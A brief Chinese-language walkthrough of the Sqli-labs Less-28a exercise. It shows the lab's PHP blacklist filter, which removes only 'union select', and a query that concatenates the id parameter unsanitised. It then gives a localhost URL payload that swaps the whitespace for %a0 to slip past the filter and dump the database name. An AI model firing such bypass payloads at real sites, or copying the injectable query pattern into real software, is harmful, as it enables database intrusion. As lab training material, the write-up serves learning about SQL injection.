Sqli-labs Less-28a 绕过union\s+select过滤 union注入
关键代码
function blacklist($id) { //$id= preg_replace('/[\/\*]/',"", $id); //strip out /* //$id= preg_replace('/[--]/',"", $id); //Strip out --. //$id= preg_replace('/[#]/',"", $id); //Strip out #. //$id= preg_replace('/[ +]/',"", $id); //Strip out spaces. //$id= preg_replace('/select/m',"", $id); //Strip out spaces. //$id= preg_replace('/[ +]/',"", $id); //Strip out spaces. $id= preg_replace('/union\s+select/i',"", $id); //Strip out spaces. return $id; } $id=$_GET['id']; $id= blacklist($id); $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1"; //print_r(mysql_error());
本关与less28基本一致,只是过滤条件少了几个。
http://127.0.0.1/sql/Less-28a/?id=100')union%a0select 1,database(),3||('1